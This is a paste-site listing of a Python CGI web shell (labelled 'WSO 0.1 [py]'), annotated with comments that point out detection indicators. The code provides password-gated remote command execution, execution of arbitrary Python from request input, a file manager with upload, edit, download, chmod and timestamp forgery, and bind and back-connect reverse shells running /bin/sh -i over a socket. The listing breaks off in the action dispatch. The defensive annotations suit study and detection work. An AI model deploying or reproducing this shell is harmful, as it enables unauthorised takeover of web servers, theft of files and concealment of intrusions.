cgiPyathon hack

From cm3l1k1, 4 Years ago, written in Python, viewed 766 times.
URL http://paste.security-portal.cz/view/46b9068a Embed
  1. #!/usr/bin/env python
  2. import sys, os, cgi, commands, time, Cookie, socket
  3. from stat import *
  4. from datetime import datetime
  5. sys.stderr = open(os.devnull, 'w')  # everything written to stderr is discarded (under CGI that is usually the server error log), so tracebacks leave no trace
  6.  
  7. password = "63a9f0ea7bb98050796b649e85481845"  # 32-hex-char digest; compared below with hashlib.md5(...).hexdigest() and with the raw 'psswd' cookie value
  8. version = "0.1 [py]"  # rendered in the page <title> as "<SERVER_NAME> - WSO <version>"; a usable content signature
  9.  
  10.  
  11. def getall(theform, nolist = False):
          # Flatten a cgi.FieldStorage-style object into a plain dict of request values.
          #   theform: object exposing keys(), item access, getlist() and getfirst().
          #   nolist:  when true, a repeated field collapses to its first value
          #            instead of a list of all values.
          # Returns the dict of non-file fields. File uploads are not returned:
          # they are stored in the module-level _FILES dict as a side effect.
  12.     data = {}
  13.     for field in theform.keys():
              # A field submitted more than once comes back as a list.
  14.         if type(theform[field]) ==  type([]):
  15.             if not nolist:
  16.                 data[field] = theform.getlist(field)
  17.             else:
  18.                 data[field] = theform.getfirst(field)
              # A non-empty filename marks a multipart file upload.
  19.         elif theform[field].filename:
  20.             _FILES[field] = theform[field]
  21.         else:
  22.             data[field] = theform[field].value
  23.     return data
  24.  
  25. def escape(str):
          # Backslash-escape single quotes, CR and LF so the value can sit inside a
          # single-quoted JavaScript string literal. Only these three characters are
          # rewritten; this is not HTML escaping. The parameter name shadows the
          # builtin `str` inside this function.
  26.     return str.replace("'", "\\'").replace("\r", "\\r").replace("\n", "\\n")
  27.  
  28. _FILES = {}  # filled by getall() with uploaded-file fields
  29. _REQUEST = getall( cgi.FieldStorage() )  # all GET/POST fields of the current request
      # Defaults for the panel's parameters. The fixed set of field names
      # (charset, a, c, p1, p2, p3) is what every request to this script carries,
      # which makes it a practical pattern for request-log and WAF matching.
      #   a       = action to dispatch (defaults to the file manager)
      #   c       = working directory
      #   p1..p3  = action-specific arguments
  30. if _REQUEST.has_key('charset') == False:
  31.     _REQUEST['charset'] = "Windows-1251"
  32. if _REQUEST.has_key('a') == False:
  33.     _REQUEST['a'] = "files"
  34. if _REQUEST.has_key('c') == False:
  35.     _REQUEST['c'] = os.getcwd()
  36. if _REQUEST.has_key('p1') == False:
  37.     _REQUEST['p1'] = ""
  38. if _REQUEST.has_key('p2') == False:
  39.     _REQUEST['p2'] = ""
  40. if _REQUEST.has_key('p3') == False:
  41.     _REQUEST['p3'] = ""
  42.  
  43. _COOKIE = Cookie.SimpleCookie()
      # Parse the request's Cookie header; the bare except also covers the case
      # where HTTP_COOKIE is absent from the environment, leaving _COOKIE empty.
  44. try:
  45.     _COOKIE.load(os.environ["HTTP_COOKIE"])
  46. except:
  47.     pass
  48.  
  49. def printLogin():
          # Clear the 'psswd' cookie, emit it as a response header, print a bare
          # password form and terminate the script via exit(). Every failed or
          # missing authentication path below ends here.
  50.     _COOKIE['psswd'] = "";
  51.     print _COOKIE;
  52.     print "Content-type: text/html\n";
  53.     print """<center><form method=post>Password: <input type=password name=psswd><input type=submit value='&gt;&gt;'></form></center>"""
  54.     exit()
  55.  
  56. if _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > 0 :
          # Returning session: the cookie value is compared directly with the stored
          # digest, so the cookie carries the digest itself. In captured traffic or
          # proxy logs, look for a 'psswd' cookie holding a 32-character hex string.
  57.     if _COOKIE['psswd'].value != password:
  58.         printLogin()
  59. elif _REQUEST.has_key('psswd'):
              # Login attempt: hash the submitted 'psswd' field with unsalted MD5
              # (hashlib where available, otherwise the legacy md5 module).
  60.         try:
  61.             import hashlib
  62.             psswd = hashlib.md5()
  63.         except:
  64.             import md5
  65.             psswd = md5.new()
  66.         psswd.update(_REQUEST['psswd'])
  67.         if psswd.hexdigest() != password:
  68.             printLogin()
  69.         else:
  70.             _COOKIE['psswd'] = psswd.hexdigest()
  71. else:
  72.     printLogin()
  73.  
      # Past this point the request is authenticated. The cookie is printed first,
      # i.e. ahead of the "Content-type" line each action prints later.
  74. print _COOKIE
  75. home_dir = os.getcwd()  # directory the script was started in; used for the "[ home ]" link
  76.  
      # Switch to the directory named by the request parameter 'c'; a failure is
      # ignored and the process stays where it was.
  77. try:
  78.     os.chdir(_REQUEST['c'])
  79. except os.error, msg:
  80.     pass
  81.  
  82. cwd = os.getcwd();
      # Normalise to a trailing slash; printHeader() splits cwd on '/'.
  83. if cwd[-1] != '/':
  84.     cwd += '/'
  85.  
  86. def printHeader():
          # Print the CGI "Content-type" header and the top of every panel page:
          # <title>, inline CSS, a JavaScript helper g() that fills the hidden form
          # 'mf' (fields a, c, p1, p2, p3, charset) and submits it by POST, then an
          # information table and the action menu.
          # The title string "<SERVER_NAME> - WSO <version>" and the hidden form
          # named 'mf' are stable strings for content-based detection of this page.
          # _REQUEST['charset'] is concatenated into the <meta> tag as received;
          # the c/a/p1/p2/p3/charset values placed in the <script> block go
          # through escape() only.
  87.     print "Content-type: text/html\n";
  88.     print "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" + _REQUEST['charset'] + "'><title>" + os.environ["SERVER_NAME"] + " - WSO " + version + """</title>
  89.    <style>
  90.        body{background-color:#444;color:#e1e1e1;}
  91.        body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
  92.        table.info{ color:#fff;background-color:#222; }
  93.        span,h1,a{ color:#df5 !important; }
  94.        span{ font-weight: bolder; }
  95.        h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
  96.        div.content{ padding: 5px;margin-left:5px;background-color:#333; }
  97.        a{ text-decoration:none; }
  98.        a:hover{ text-decoration:underline; }
  99.        .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  100.        .bigarea{ width:100%;height:250px; }
  101.        input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,"Courier New"; }
  102.        form{ margin:0px; }
  103.        #toolsTbl{ text-align:center; }
  104.        .toolsInp{ width: 300px }
  105.        .main th{text-align:left;background-color:#5e5e5e;}
  106.        .main tr:hover{background-color:#5e5e5e}
  107.        .l1{background-color:#444}
  108.        pre,.m{font-family:Courier,Monospace;}
  109.    </style>
  110.    <script>
  111.        var c_ = '""" + escape(_REQUEST['c']) + """';
  112.        var a_ = '""" + escape(_REQUEST['a']) + """';
  113.        var p1_ = '""" + escape(_REQUEST['p1']) + """';
  114.        var p2_ = '""" + escape(_REQUEST['p2']) + """';
  115.        var p3_ = '""" + escape(_REQUEST['p3']) + """';
  116.        var charset_ = '""" + escape( _REQUEST['charset'] ) + """';
  117.        function g(a,c,p1,p2,p3,charset) {
  118.            if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
  119.            if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
  120.            if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
  121.            if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
  122.            if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
  123.            if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
  124.            document.mf.submit();
  125.        }
  126.    </script>
  127.    <head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
  128.    <form method=post name=mf style='display:none;'>
  129.    <input type=hidden name=a>
  130.    <input type=hidden name=c>
  131.    <input type=hidden name=p1>
  132.    <input type=hidden name=p2>
  133.    <input type=hidden name=p3>
  134.    <input type=hidden name=charset>
  135.    </form>"""
           # Host information block: os.uname() fields, the output of the external
           # `id` command, local time, and the SERVER_ADDR / REMOTE_ADDR CGI variables.
           # The `id` call means every page view spawns a child process from the CGI
           # interpreter, which shows up in process-creation telemetry.
  136.     print '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Time:<br>Cwd:</span></td>'
  137.     print '<td><nobr>'
  138.     for x in os.uname():
  139.         sys.stdout.write(x+' ')
  140.     t = time.localtime()
  141.     print '</nobr><br>%s<br>%d-%.2d-%.2d %.2d:%.2d:%.2d <span>Server IP:</span> %s <span>Client IP:</span> %s<br>' %( commands.getoutput( 'id' ), t[0], t[1], t[2], t[3], t[4], t[5], os.environ['SERVER_ADDR'], os.environ['REMOTE_ADDR'])
           # Breadcrumb: one clickable link per component of cwd; cwd ends in '/',
           # so the empty last element of the split is dropped first.
  142.     path = ''
  143.     paths = cwd.split('/')
  144.     paths.pop()
  145.     for x in paths:
  146.         path += x + '/'
  147.         sys.stdout.write("""<a href="#" onclick="g('files','"""+escape(path)+"""', '', '', '')">"""+x+"""/</a>""")
           # permsColor() is defined further down the file; it is resolved when this
           # function runs, not when it is defined.
  148.     print " " + permsColor(cwd),"""<a href='#' onclick="g('files','"""+ escape( home_dir ) +"""', '', '', '')">[ home ]</a>"""
           # Page-charset selector; the entry equal to the request's charset is pre-selected.
  149.     charsets = ['UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866']
  150.     print '<td width=1 align=right><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'
  151.     for charset in charsets:
  152.         sys.stdout.write('<option value="%s" ' % charset)
  153.         if _REQUEST['charset'] == charset:
  154.              sys.stdout.write('selected')
  155.         sys.stdout.write('>%s</option>' % charset)
  156.     print '</optgroup></select><br></td></tr></table><table style="border-top:2px solid #333;text-align: center;" cellpadding=3 cellspacing=0 width=100%><tr>'
           # Menu tabs; the lower-cased label becomes the 'a' parameter of the next request.
  157.     for x in ['Files', 'Console', 'Python', 'Network']:
  158.         print "<td width='100px'>[ <a href='#' onclick='g(\""+x.lower()+'", null, "", "", "")\'>'+x+'</a> ]</td>'
  159.     print '<td></td></tr></table><div style="margin:5">'
  160.  
  161. def printFooter():
           # Print the bottom toolbar shown on every page and close the document.
           # The forms map onto the actions below: change dir ('c'), read file and
           # make file ('fileTools'), make dir and upload ('files'), execute ('console').
           # cwd and _REQUEST['charset'] are concatenated into attribute values as-is.
  162.     if os.access (cwd, os.W_OK):
  163.         writable = "<font color=green>[ Writeable ]</font>"
  164.     else:
  165.         writable = "<font color=red>[ Not writable ]</font>"
  166.     print """</div>
  167. <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style="border-top:2px solid #333;border-bottom:2px solid #333;">
  168.         <tr>
  169.                 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value='""" + cwd + """'><input type=submit value="&gt;&gt;"></form></td>
  170.                 <td><form onsubmit="g('fileTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value="&gt;&gt;"></form></td>
  171.         </tr>
  172.         <tr>
  173.                 <td><form onsubmit="g('files',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>
  174.                 <td><form onsubmit="g('fileTools',null,this.f.value,'save','');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>
  175.         </tr>
  176.         <tr>
  177.                 <td><form onsubmit="g('console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value="&gt;&gt;"></form></td>
  178.                 <td><form method='post' ENCTYPE='multipart/form-data'>
  179.                 <input type=hidden name=a value='files'>
  180.                 <input type=hidden name=c value='"""+cwd+"""'>
  181.                 <input type=hidden name=p1 value='uploadFile'>
  182.                 <input type=hidden name=charset value='"""+_REQUEST['charset']+"""'>
  183.                 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value="&gt;&gt;"></form>"""+writable+"""</td>
  184.         </tr>
  185.  
  186. </table>
  187. </div>
  188. </body></html>"""
  189.  
  190. def viewSize(s):
           # Format a byte count for display: two decimals plus GB / MB / KB using
           # 1024-based thresholds, or the plain number followed by ' B' below 1024.
           # Note the two spaces between number and unit in the scaled forms.
  191.     if s >= 1073741824:
  192.                 return "%1.2f  GB" % (s / 1073741824.0);
  193.     elif s >= 1048576:
  194.                 return "%1.2f  MB" % (s / 1048576.0);
  195.     elif s >= 1024:
  196.                 return "%1.2f  KB" % (s / 1024.0);
  197.     else:
  198.                 return str(s) + ' B';
  199.  
  200. def perms(p):
           # Return an `ls -l`-style 10-character mode string for path p.
           # lstat() is used, so a symlink is described itself rather than its target.
           # Raises OSError from os.lstat() when the path cannot be stat'ed.
  201.     mode = os.lstat(p)[ST_MODE]
  202.     p = mode  # from here on p holds the numeric mode, not the path
  203.     i="";
           # File-type character. The masks are tested from the largest value down,
           # so e.g. a socket (0xC000) is matched before a regular file (0x8000).
  204.     if (p & 0xC000) == 0xC000:
  205.         i = 's'
  206.     elif (p & 0xA000) == 0xA000:
  207.         i = 'l'
  208.     elif (p & 0x8000) == 0x8000:
  209.         i = '-'
  210.     elif (p & 0x6000) == 0x6000:
  211.         i = 'b'
  212.     elif (p & 0x4000) == 0x4000:
  213.         i = 'd'
  214.     elif (p & 0x2000) == 0x2000:
  215.         i = 'c'
  216.     elif (p & 0x1000) == 0x1000:
  217.         i = 'p'
  218.     else:
  219.         i = 'u'
           # Owner triplet; bit 0x0800 (setuid) replaces x with s, or - with S.
  220.     if p & 0x0100: i += 'r'
  221.     else: i += '-'
  222.     if p & 0x0080: i += 'w'
  223.     else: i += '-'
  224.     if  p & 0x0040:
  225.         if p & 0x0800: i += 's'
  226.         else: i += 'x'
  227.     else:
  228.         if p & 0x0800: i += 'S'
  229.         else: i+='-'
           # Group triplet; bit 0x0400 (setgid) replaces x with s, or - with S.
  230.     if p & 0x0020: i += 'r'
  231.     else: i += '-'
  232.     if p & 0x0010: i += 'w'
  233.     else: i += '-'
  234.     if  p & 0x0008:
  235.         if p & 0x0400: i += 's'
  236.         else: i += 'x'
  237.     else:
  238.         if p & 0x0400: i += 'S'
  239.         else: i += '-'
           # Other triplet; bit 0x0200 (sticky) replaces x with t, or - with T.
  240.     if p & 0x0004: i += 'r'
  241.     else: i += '-'
  242.     if p & 0x0002: i += 'w'
  243.     else: i += '-'
  244.     if  p & 0x0001:
  245.         if p & 0x0200: i += 't'
  246.         else: i += 'x'
  247.     else:
  248.         if p & 0x0200: i += 'T'
  249.         else: i += '-'
  250.  
  251.     return i;
  252.  
  253. def permsColor(path):
           # Wrap perms(path) in a <font> tag coloured by what the current process
           # can do with the path: red = not readable, green = writable,
           # white = readable but not writable.
  254.     if not os.access (path, os.R_OK):
  255.         return "<font color='#FF0000'>"+perms(path)+"</font>"
  256.     elif os.access (path, os.W_OK):
  257.         return "<font color='#00BB00'>"+perms(path)+"</font>"
  258.     else:
  259.         return "<font color='white'>"+perms(path)+"</font>"
  260.  
  261. def actionConsole():
           # 'console' action: render a pseudo-terminal page and, when p1 is
           # non-empty, run it as a command and show the output.
           # The request parameter is handed unchanged to commands.getoutput(), which
           # executes it through the system shell with the privileges of the CGI
           # process. Detection: a shell spawned as a child of the web server's
           # CGI/Python process, correlated with POSTs carrying a=console.
  262.     printHeader()
  263.     print "<h1>Console</h1><div class=content>"
  264.     print """<form name="cf" onSubmit="g(null, null, this.cmd.value);return false;" style="border:1px solid #df5;background-color:#555;"><textarea class=bigarea style="border:0px;" readonly>"""
  265.     if len(_REQUEST['p1']) > 0:
               # Both the echoed command and its output are HTML-escaped before display.
  266.         print '$', cgi.escape(_REQUEST['p1'])
  267.         print cgi.escape(commands.getoutput(_REQUEST['p1']))
  268.  
  269.     print '</textarea><table cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;"></td></tr></table>'
  270.     print "</form></div><script>document.cf.cmd.focus();</script>"
  271.     printFooter()
  272.  
  273. def actionFiles():
           # 'files' action (the default): optional upload or mkdir, then a listing
           # of the current directory with per-entry links into 'fileTools'.
  274.     printHeader()
  275.     if _REQUEST['p1'] == 'uploadFile':
               # Write the uploaded field 'f' into the current working directory under
               # its basename; an existing file of that name is overwritten ('wb').
               # Any error is swallowed. For triage: new files owned by the web
               # server account in directories the web server can write to.
  276.         try:
  277.             if _FILES['f'].filename:
  278.                 fn = os.path.basename(_FILES['f'].filename)
  279.                 open(fn, 'wb').write(_FILES['f'].file.read())
  280.         except: pass
  281.     if _REQUEST['p1'] == 'mkdir':
               # Create the directory named by p2; failures are ignored.
  282.         try: os.mkdir(_REQUEST['p2'])
  283.         except: pass
  284.     print "<h1>File manager</h1><div class=content>"
  285.     item_stat = os.lstat('..')
  286.  
  287.     def dirItemInfo(name, item_stat):
               # Build the display record for one directory entry from its lstat
               # result. Entries are labelled "link" or "dir" only; regular files use
               # the 'size' column instead of 'type' when rendered below.
               # The local name `type` shadows the builtin inside this helper.
  288.         if S_ISLNK(item_stat[ST_MODE]):
  289.             type = "link"
  290.         else:
  291.             type = "dir"
  292.         tmp = {
  293.                 'name'  : name,
  294.                 'path'  : os.path.join(cwd, name),
  295.                 'size'  : viewSize(item_stat[ST_SIZE]),
  296.                 'mtime' : datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S"),
  297.                 'uid'   : str(item_stat[ST_UID]),
  298.                 'gid'   : str(item_stat[ST_GID]),
  299.                 'perms' : permsColor(name),
  300.                 'type'  : type
  301.               }
  302.         return tmp
           # The parent directory is always the first candidate in the directory list.
  303.     dirs = [dirItemInfo('..', os.lstat('..'))]
  304.     files = []
  305.  
           # Classify entries: symlinks and directories go to `dirs`, regular files
           # to `files`; other types (devices, sockets, FIFOs) are not listed.
  306.     for item in os.listdir(cwd):
  307.         item_stat = os.lstat(item)
  308.         mode = item_stat[ST_MODE]
  309.         tmp = dirItemInfo(item, item_stat)
  310.         if S_ISLNK(mode) or S_ISDIR(mode):
  311.             dirs.append(tmp)
  312.         elif S_ISREG(mode):
  313.             files.append(tmp)
  314.  
  315.     print "<table width='100%' class='main' cellspacing='0' cellpadding='2'><form method='post'>"
  316.     print """<tr><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>""";
  317.    
  318.     def sort(a, b):
               # Python 2 cmp-style comparator: case-insensitive order by entry name.
  319.         return cmp(a['name'].lower(), b['name'].lower())
  320.  
           # `line` alternates 0/1 so every second row gets the CSS class l1.
  321.     line = 0
  322.     for item in sorted(dirs, sort):
  323.         print "<tr"
  324.         if line:
  325.             print " class=l1"
               # Displayed names pass through cgi.escape(); values placed inside the
               # onclick handlers pass through escape() only.
  326.         print "><td><a href='#' onclick='g(null,\""+escape(item['path'])+"\")'><b>[ "+cgi.escape(item['name'])+" ]</b></a></td><td>"+item['type']+"</td><td>"+item['mtime']+"</td><td>"+item['uid']+"/"+item['gid']+"</td><td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'chmod')\">"+item['perms']+"</a></td>"
  327.         print "<td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'rename')\">R</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'touch')\">T</a></td></tr>"
  328.         line = (line + 1)%2
  329.     for item in sorted(files, sort):
  330.         print "<tr"
  331.         if line:
  332.             print " class=l1"
  333.         print "><td><a href='#' onclick='g(\"fileTools\",null,\""+escape(item['name'])+"\")'>"+cgi.escape(item['name'])+"</a></td><td>"+item['size']+"</td><td>"+item['mtime']+"</td><td>"+item['uid']+"/"+item['gid']+"</td><td><a href=# onclick=\"g('fileTools', null, '"+escape(item['path'])+"', 'chmod')\">"+item['perms']+"</a></td>"
  334.         print "<td><a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'rename')\">R</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'touch')\">T</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'edit')\">E</a> <a href=# onclick=\"g('fileTools', null, '"+escape(item['name'])+"', 'download')\">D</a></td></tr>"
  335.         line = (line + 1)%2
  336.  
  337.     print "</form></table></div>"
  338.     printFooter()
  339.  
  340. def actionFileTools():
           # 'fileTools' action: operate on the single path given in p1.
           # p2 selects the operation (view, download, save, edit, chmod, rename,
           # touch; empty means view) and p3 carries its argument. p1 is used as
           # received, with no restriction on which path it names.
  341.     if _REQUEST['p2'] == "":
  342.         _REQUEST['p2'] = "view"
  343.     if _REQUEST['p2'] == "download":
               # Stream the file back as an attachment. Only a Content-Disposition
               # header is printed here (no Content-type), then the file content;
               # read errors are swallowed and the function returns without any HTML.
               # Responses from a CGI path with this header and large bodies are
               # worth reviewing when scoping what data left the host.
  344.         print "Content-Disposition: attachment; filename=" + os.path.basename(_REQUEST['p1']) + "\n"
  345.         try:
  346.             fp = open(_REQUEST['p1'], 'rb')
  347.             for x in fp.readlines():
  348.                 sys.stdout.write(x)
  349.             fp.close()
  350.         except: pass
  351.         return
  352.     if _REQUEST['p2'] == "save":
               # Overwrite (or create) p1 with the content of p3, then fall through
               # to the edit view. Errors are swallowed.
  353.         try:
  354.             fp = open(_REQUEST['p1'], 'w')
  355.             fp.write(_REQUEST['p3'])
  356.             fp.close()
  357.         except: pass
  358.         _REQUEST['p2'] = 'edit'
  359.     printHeader()
  360.     print "<h1>File tools</h1><div class=content>"
           # os.stat() is not wrapped in try/except here: a missing or unreadable
           # path raises OSError out of this function.
  361.     item_stat = os.stat(_REQUEST['p1'])
  362.     print "<span>File: </span>" + os.path.basename(_REQUEST['p1']) + " <span>Size: </span> " +viewSize(item_stat[ST_SIZE]) + " <span>Permission:</span> " +permsColor(_REQUEST['p1'])
  363.     print "<br/>"
           # Directories get a reduced menu (no view/download/edit).
  364.     if S_ISDIR(item_stat[ST_MODE]):
  365.         menu = ['Chmod', 'Rename', 'Touch']
  366.     else:
  367.         menu = ['View', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch']
  368.     for x in menu:
  369.         print "<a href=# onclick=\"g(null, null, null, '"+x.lower()+"')\">"
  370.         if x.lower() == _REQUEST['p2']:
  371.             print "<b>[ " + x + " ]</b>"
  372.         else:
  373.             print x
  374.         print "</a> "
  375.     print "<br><br>";
  376.     if _REQUEST['p2'] == "view":
               # Read-only display; file content is HTML-escaped line by line.
  377.         try:
  378.             fp = open(_REQUEST['p1'], 'r')
  379.             print "<pre class=ml1>"
  380.             for x in fp.readlines():
  381.                 sys.stdout.write(cgi.escape(x))
  382.             fp.close()
  383.             print "</pre>"
  384.         except:
  385.             print "Can't open file! "+_REQUEST['p1']
  386.     if _REQUEST['p2'] == "edit":
               # Same as view, but inside a textarea whose submit handler posts the
               # edited text back as p3 with p2='save'.
  387.         try:
  388.             fp = open(_REQUEST['p1'], 'r')
  389.             print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'save', this.f.value);return false;\"><textarea name=f class=bigarea>"
  390.             for x in fp.readlines():
  391.                 sys.stdout.write(cgi.escape(x))
  392.             fp.close()
  393.             print "</textarea><input type='submit' value='&gt;&gt;'></form>"
  394.         except:
  395.             print "Can't open (create) file! "+_REQUEST['p1']
  396.     if _REQUEST['p2'] == "chmod":
  397.         import stat, string
  398.         if len(_REQUEST['p3']):
                   # p3 is parsed as an octal number; the parse sits outside the try,
                   # so a non-octal value raises out of the function.
  399.             perm = string.atoi(_REQUEST['p3'], 8)
  400.             try:
  401.                 os.chmod(_REQUEST['p1'], perm)
  402.                 print "Done"
  403.             except: print "Fail!"
               # Form pre-filled with the current permission bits in octal.
  404.         print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'chmod', this.p.value);return false;\"><input type='text' name='p' value='"
  405.         print "%o" % stat.S_IMODE(os.stat(_REQUEST['p1'])[ST_MODE])
  406.         print "'/><input type='submit' value='&gt;&gt;'></form>"
  407.     if _REQUEST['p2'] == "rename":
  408.         if len(_REQUEST['p3']):
                   # Rename p1 to p3 and continue working on the new name.
  409.             try:
  410.                 os.rename(_REQUEST['p1'], _REQUEST['p3'])
  411.                 _REQUEST['p1'] = _REQUEST['p3']
  412.                 print "Done<script>p2_='" + escape(_REQUEST['p3']) + "'</script>"
  413.             except: print "Fail!"
  414.         print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'rename', this.n.value);return false;\"><input type='text' name='n' value='" + escape(_REQUEST['p1'])+ "'/><input type='submit' value='&gt;&gt;'></form>"
  415.  
  416.     if _REQUEST['p2'] == "touch":
               # Sets both access and modification time of p1 to the timestamp in p3
               # ("%Y-%m-%d %H:%M:%S", interpreted as local time by time.mktime).
               # Forensic consequence: atime/mtime of files on a host where this
               # script ran cannot be taken at face value.
               # NOTE(review): on POSIX, os.utime() does not let the caller choose the
               # inode change time, so ctime is the better timestamp to check - confirm
               # for the filesystem in question.
  417.         if len(_REQUEST['p3']):
  418.             try:
  419.                 tmstmp = time.mktime(time.strptime(_REQUEST['p3'], "%Y-%m-%d %H:%M:%S"))
  420.                 os.utime(_REQUEST['p1'], (tmstmp, tmstmp))
  421.                 item_stat = os.stat(_REQUEST['p1'])
  422.                 print "Done"
  423.             except: print "Fail!"
               # Form pre-filled with the file's current (possibly just changed) mtime.
  424.         print "<form onsubmit=\"g(null,null,'"+escape(_REQUEST['p1'])+"', 'touch', this.n.value);return false;\"><input type='text' name='n' value='"
  425.         print datetime.fromtimestamp(item_stat[ST_MTIME]).strftime("%Y-%m-%d %H:%M:%S")
  426.         print "'/><input type='submit' value='&gt;&gt;'></form>"
  427.  
  428.     print "</div>"
  429.     printFooter()
  430.  
  431. def actionPython():
           # 'python' action: render a code box and, when p1 is non-empty, execute
           # it as Python source inside this CGI process.
           # exec() runs the request parameter with full access to this module's
           # globals and the interpreter's privileges; nothing constrains it.
           # Because the code runs in-process, no child process is created, so
           # process-creation telemetry alone will not show this activity; request
           # logging for POSTs with a=python is the more useful source.
  432.     printHeader()
  433.     print "<h1>Exec python code</h1><div class=content>"
  434.     print """<form name="cf" onSubmit="g(null, null, this.c.value);return false;"><textarea class=bigarea name=c>"""
  435.     print '</textarea><input type=submit value="&gt;&gt;">'
  436.     if len(_REQUEST['p1']) > 0:
  437.         print '<pre class="ml1" style="margin-top:5px;">'
  438.         try:
                   # stdout is swapped for an in-memory buffer during exec so the
                   # executed code's output can be HTML-escaped before it is printed.
  439.             import StringIO
  440.             old_stdout = sys.stdout
  441.             sys.stdout = StringIO.StringIO()
  442.             exec(_REQUEST['p1'])
  443.             data = sys.stdout.getvalue()
  444.             sys.stdout = old_stdout
  445.             print cgi.escape(data)
  446.         except:
  447.             pass
  448.         print '</pre>'
  449.     print "</form></div>"
  450.     printFooter()
  451.  
  452. def actionNetwork():
           # 'network' action: offers two ways of attaching an interactive /bin/sh
           # to a TCP socket - 'bp' (listen on a port) and 'bc' (connect out to a
           # server). p1 selects the mode; p2/p3 carry port or server and port.
           # Defensive indicators visible in this code:
           #   - `/bin/sh -i` started as a descendant of the web server's CGI process
           #     with file descriptors 0, 1 and 2 all referring to one socket;
           #   - a CGI-spawned process holding a listening socket, or making an
           #     outbound TCP connection; the form pre-fills port 31337 and the
           #     requester's own address (REMOTE_ADDR) as the connect-back target.
           # Egress filtering for the web server account and alerting on shells
           # whose stdio is a socket address both branches.
  453.     printHeader()
  454.     print """<h1>Network tools</h1><div class=content>
  455.    <form name='nfp' onSubmit="g(null,null,'bp',this.port.value);return false;">
  456.         <span>Bind port to /bin/sh</span><br/>
  457.         Port: <input type='text' name='port' value='31337'><input type=submit value=">>">
  458.         </form>
  459.         <form name='nfp' onSubmit="g(null,null,'bc',this.server.value,this.port.value);return false;">
  460.         <span>Back-connect to</span><br/>
  461.         Server: <input type='text' name='server' value='"""+os.environ['REMOTE_ADDR']+"""'> Port: <input type='text' name='port' value='31337'><input type=submit value=">>">
  462.         </form><br>"""
  463.     if _REQUEST['p1'] != "":
               # One TCP socket with a 10-second timeout, shared by both modes.
  464.         sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  465.         sock.settimeout(10)
  466.     if _REQUEST['p1'] == "bp":
               # The listener is bound to the name 'localhost', not to all interfaces.
  467.         try:
  468.             sock.bind(('localhost', int(_REQUEST['p2'])))
  469.             sock.listen(0)
  470.         except:
  471.             print "error"
  472.         else:
  473.             print "done"
               # This fork/accept sequence is outside the try/else above, so it runs
               # whether or not bind()/listen() succeeded. The branch taken is the one
               # where fork() returns non-zero.
  474.         if os.fork()!=0:
  475.             (c,addr)=sock.accept()
                   # stdin, stdout and stderr are pointed at the accepted connection
                   # before the shell starts.
  476.             os.dup2(c.fileno(), 0)
  477.             os.dup2(c.fileno(), 1)
  478.             os.dup2(c.fileno(), 2)
  479.             os.system('/bin/sh -i')
  480.             c.shutdown(2)
  481.             sock.shutdown(2)
  482.     elif _REQUEST['p1'] == "bc":
               # Outbound variant: host from p2, port from p3; the shell is only
               # started when connect() succeeded.
  483.         try:
  484.             sock.connect( (_REQUEST['p2'], int(_REQUEST['p3'])) )
  485.         except:
  486.             print "error"
  487.         else:
  488.             print "done"
  489.             if os.fork()!=0:
  490.                 os.dup2(sock.fileno(), 0)
  491.                 os.dup2(sock.fileno(), 1)
  492.                 os.dup2(sock.fileno(), 2)
  493.                 os.system('/bin/sh -i')
  494.                 sock.shutdown(2)
  495.     print "</div>"
  496.     printFooter()
  497.  
  498.  
  499. try:
           # Entry point: dispatch on the request parameter 'a'. The five keys below
           # are the complete set of actions; any other value raises KeyError and
           # yields an empty page consisting of header and footer only.
           # For log review, the accepted values of 'a' are exactly: files,
           # fileTools, console, python, network.
  500.     {
  501.         'files' : actionFiles,
  502.         'fileTools' : actionFileTools,
  503.         'console' : actionConsole,
  504.         'python' : actionPython,
